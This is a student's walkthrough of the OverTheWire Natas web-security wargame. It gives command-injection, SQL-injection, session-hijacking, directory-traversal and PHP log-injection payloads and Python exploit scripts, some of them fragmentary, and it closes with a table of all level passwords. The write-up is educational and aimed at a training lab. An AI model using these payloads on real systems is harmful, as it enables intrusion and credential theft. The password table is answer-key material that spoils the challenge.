I'm a Cyber Security student.
Natas is a web-based wargame that challenges players to solve a series of challenges by exploiting various security vulnerabilities. The challenges start out relatively easy and become progressively more difficult. The objective is to learn and practice web security concepts, such as SQL injection, cross-site scripting (XSS), and authentication bypass.
The challenges in Natas are divided into levels, each of which has its own URL and set of credentials. Players must navigate through the levels and find a password or some other hidden information in order to proceed to the next level.
You can access to these labs from below link
- Natas 1
- Natas 2
- Natas 3
- Natas 4
- Natas 5
- Natas 6
- Natas 7
- Natas 8
- Natas 9
- Natas 10
- Natas 11
- Natas 12
- Natas 13
- Natas 14
- Natas 15
- Natas 16
- Natas 17
- Natas 18
- Natas 19
- Natas 20
- Natas 21
- Natas 22
- Natas 23
- Natas 24
- Natas 25
- Natas 26
- Natas 27
We just find the password of natas1 on source code of http://natas0.natas.labs.overthewire.org/
Even though, we cannot do right click on mouse on web page. We just use keyboard (Ctrl+U) to find password of Natas2
After we looking at the source code of web page.We just see files directory and we just look at this directory and find sensitive file.
Yes here we have the password of natas3.
Here, We just do Directory Fuzzing to find hidden directories.
After analyzing this directory. We find password of natas4.
Whenever, we just open page, we just see that we can be authorized when request come from specific URL. That's why we need to intercept the request and change Referer header of request.
After we open page, we see that Not Logged In problem and couldn't find anything on source page. I just analyze request and look at the Cookie header of request. I just modify 0 with 1 to be logged in.
We just analyze the source code of web page and understand the directory "includes/secret.inc". We get secret of natas7 from "includes/secret.inc". Finally, we write the secret and get password of natas7.
Again, we look at the source code and see the thing which we saw on introduction page of CTF that passwords are located /etc/natas_webpass directory.
And we just modify URL as because on index.php file , there is page parameter, after modifying this, we find password of natas8.
Here, we just analyze the source code and see that there is encoded secret.
After analyzing on Cyberchef and found basic Entropy of encryption.
Entering the encryption key and get password of natas9.
Here we just, see that our input executed as command on Linux system. Here Command Injection vulnerability appears.
The most known character for OS injection is semicolon(;). Payload=> ;cat /etc/natas_webpass/natas10
As on previous section, Command Injection vulnerability appears but with a little bit hard regex which we need to bypass to execute commands. The regular expression /[;|&]/ disallows the characters semicolon (;), pipe (|), and ampersand (&).
Here, to make easy for me, I just fuzz the needle parameter with OS injection payloads.
Finally, I just modify filename with file that contains password of natas11. %0A=>newline %20=>space
To solve this lab, we just need to understand the encryption algorithm of Cookie that we need to change value inside of this which needs to be like this "showpassword=yes", then we can easily see password of natas12.
We understand that, our clear_data like this (array( "showpassword"=>"no", "bgcolor"=>"#ffffff"))
1.First, we need to decrypt our cookie and get value.
2.From here, we just analyze that json_encode function is also used in backend.
3.And finally, predefined XOR encoding, we got key (KNHL)
Now it's time to encrypt our pass_data (array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))
Finally, we got password of natas12.
Here, we just are in front of application which have File Upload Vulnerability, so that we just intercept the request while image uploading, change filename,content-type also body of file which will read the password of natas13.
Then, we browse the file and get the password of natas13.
It is the same File Upload Vulnerability vuln as previous one, here we just modify content of malicious file with bytes of image, as because web application just checks first 20 or 30 bytes of content.
Then, we browse the file and get password of natas14.
Now, time to practice **SQL Injection". To make easy for me , I just use Fuzzer by adding payloads for login bypass.
Yes, it is also SQL Injection, but this one is Blind (Boolean) means we cannot see the result of SQLI on web page.
Payload=>smt" UNION ALL SELECT 1,2 FROM users WHERE username="natas16" AND substring(password,$1$,1)= BINARY "$a$" LIMIT 1 OFFSET 0;#
From below result, response(913 bytes) is our answer.
Now, as we analyze the source code, we can see that our input executed as command, that's why Command Injection(Blind) appears. For this, I just code python exploit, let's look at the exploit to find password of natas17.
import requests
import re
import string
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits
user = 'natas16'
passw = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'
url = 'http://natas16.natas.labs.overthewire.org/'
session = requests.Session()
response = session.get(url, auth = (user, passw) )
seen_password = list()
while ( len(seen_password) < 32 ):
for character in chars:
print ("".join(seen_password) + character)
response = session.post(url, data = { "needle" : "anythings$(grep ^" + "".join(seen_password) + character + " /etc/natas_webpass/natas17)" },auth = (user, passw) )
content = response.text
returned = re.findall( '<pre>\n(.*)\n</pre>', content )
if ( not returned ):
seen_password.append( character )
Again, we come across with SQL Injection(Time-Based) vulnerability and I decide to solve this CTF, I use previous code by modifying exploit.
import requests
import re
import string
from time import *
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits
user = 'natas17'
passw = 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd'
url = 'http://natas17.natas.labs.overthewire.org/'
for character in chars:
response=session.post(url,data={'username':'natas18" AND BINARY password LIKE "'+ "".join(pospass)+character+ '%" AND SLEEP(1) # '},auth=(user,passw))
if dif>1:
Here, I just put image for you the output of code to imagine the purpose of exploit.
From this lab, I understood that here PHPSESSSION that which needs to be value 640 as maximum. For that, we need to brute-force from 1 to 641 to log in as admin to see password of natas19. To automate process, I just use ZAP.
This lab looks like the previous one, but differnce is that Session IDs are not sequential. As because they are just Hex-Encoded.
Actually, it is simple again we just need to brute-forcing but here Payload Processing should be done. Let's try to do this with Python code, that we just enter clear_data to encode as HEX.
for i in range(1,641,1):
Outputs of this code, we will use for brute-forcing.
On this CTF, we just see PHPSESSID is not predictable, that's why we need to read source code. From source code analysis, I just understood that page checks session's admin key that is equal to 1 or not, then you can be admin. That's why when we do POST request, we just get the previous session to use secondly to be admin user.
I just implement Python code for this, you can look at.
import requests
target = 'http://natas20.natas.labs.overthewire.org'
auth = ('natas20', 'guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH')
#First request to get session of admin
params = dict(name='admin\nadmin 1', debug='') # <-- this is the key part
cookies = dict()
response = requests.get(target, auth=auth, params=params, cookies=cookies)
phpsessid = response.cookies['PHPSESSID']
#Second request to be admin
params = dict(debug='')
cookies = dict(PHPSESSID=phpsessid)
response = requests.get(target, auth=auth, params=params, cookies=cookies)
You can see also output of above code.
Actually, this is similar to previous one, but here we get our admin session from Specified URL on home page. That's why, I just modify previous script to find password.
import requests
target = 'http://natas21.natas.labs.overthewire.org'
auth = ('natas21', '89OWrTkGmiLZLv12JY4tLj2c4FW0xn56')
#First POST request to get session of admin from exp_tar
response = session.post(exp_tar, auth=auth)
admin_session = session.cookies['PHPSESSID']
#Second request to be admin
response = requests.get(target, auth=auth,cookies={"PHPSESSID":admin_session})
You can see also the output of above Python code.
On this lab, I just understood from source code that, we need to block Redirect while requesting to specific parameter "revelio" which appeared on source code, too. That's why to make this request easy for us, Python code is useful for us.We need to allow_redirects=False to GET request.
import requests
target = 'http://natas22.natas.labs.overthewire.org/?revelio=1'
auth = ('natas22', '91awVM9oDiUGm33JdzM7RVLBS8bz9n0s')
response = session.get(target, auth=auth,allow_redirects=False)
From source code, we can see that password which we need to enter should be inside "iloveyou" string and length of this higher than 10.
But important part is here that, PHP type vuln which we just enter integer values.
On this CTF, I just see strcomp method which is used to compare two strings.I just searched for this method to find anything on Internet. I found already.
I just do the same thing as above to solve CTF and it worked.
To solve this CTF, vulnerable parameter for me is lang as because content is generated due to lang parameter's value. Here, Directory Traversal comes to my mind.
However, we look at the source code and identifies that we just access to "/etc/natas_webpass/natas26" file(Code Injection on User-Agent) with session located "var/www/natas/natas25/logs/"
import requests
target = 'http://natas25.natas.labs.overthewire.org/?revelio=1'
auth = ('natas25', 'O9QD9DZBDq1YpswiTM5oqMDaOtuZtAcx')
malhead={"User-Agent":'<?php echo file_get_contents("/etc/natas_webpass/natas26"); ?>'}
response = session.get(target, auth=auth)
response=session.post(url=target,headers=malhead,auth=auth,data={"lang" : "..././..././..././..././..././var/www/natas/natas25/logs/natas25_" + session.cookies['PHPSESSID'] + ".log"})
Output of above code can be hidden, that's why I put image for you to see.
When we analyze the Sessions just see that there is session called "drawing" and encode this, we just see deserialized object. Now, we just maliciously modify this, makes serialized and get password of natas27.
After chaning session id, we just browse '/img/winner.php' file to see results.
User | Password |
natas1 | g9D9cREhslqBKtcA2uocGHPfMZVzeFK6 |
natas2 | h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7 |
natas3 | G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q |
natas4 | tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm |
natas5 | Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD |
natas6 | fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR |
natas7 | jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr |
natas8 | a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB |
natas9 | Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd |
natas10 | D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE |
natas11 | 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg |
natas12 | YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG |
natas13 | lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9 |
natas14 | qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP |
natas15 | TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB |
natas16 | TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V |
natas17 | XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd |
natas18 | 8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq |
natas19 | 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s |
natas20 | guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH |
natas21 | 89OWrTkGmiLZLv12JY4tLj2c4FW0xn56 |
natas22 | 91awVM9oDiUGm33JdzM7RVLBS8bz9n0s |
natas23 | qjA8cOoKFTzJhtV0Fzvt92fgvxVnVRBj |
natas24 | 0xzF30T9Av8lgXhW7slhFCIsVKAPyl2r |
natas25 | O9QD9DZBDq1YpswiTM5oqMDaOtuZtAcx |
natas26 | 8A506rfIAXbKKk68yJeuTuRq4UfcK70k |
natas27 | PSO8xysPi00WKIiZZ6s6PtRmFy9cbxj3 |